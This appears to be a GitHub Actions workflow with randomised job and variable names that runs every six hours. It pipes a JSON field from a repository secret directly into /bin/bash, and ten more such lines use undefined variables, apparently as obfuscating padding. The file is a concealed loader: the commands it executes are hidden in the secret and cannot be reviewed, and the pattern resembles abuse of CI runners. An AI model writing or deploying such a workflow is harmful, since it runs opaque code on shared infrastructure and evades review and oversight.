name: yuanbanlao1839

on:
  workflow_dispatch:
  schedule:
    - cron: '57 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yuanbanlao1839
        env:
          vxo92075: ${{ secrets.vxo92075 }}
        run: |
          echo $vxo92075 | jq -r .ilo305 | /bin/bash
          echo $mz207 | jq -r .qcjz861 | /bin/bash
          echo $qbo85 | jq -r .u1371 | /bin/bash
          echo $iv561 | jq -r .pzjx650 | /bin/bash
          echo $wd72143 | jq -r .sz350 | /bin/bash
          echo $v10556 | jq -r .lxv8 | /bin/bash
          echo $axcq40 | jq -r .j4 | /bin/bash
          echo $t78 | jq -r .lm77 | /bin/bash
          echo $eo3630 | jq -r .s6 | /bin/bash
          echo $yzqn76 | jq -r .c268 | /bin/bash
          echo $ipmxw168 | jq -r .abqpz2 | /bin/bash

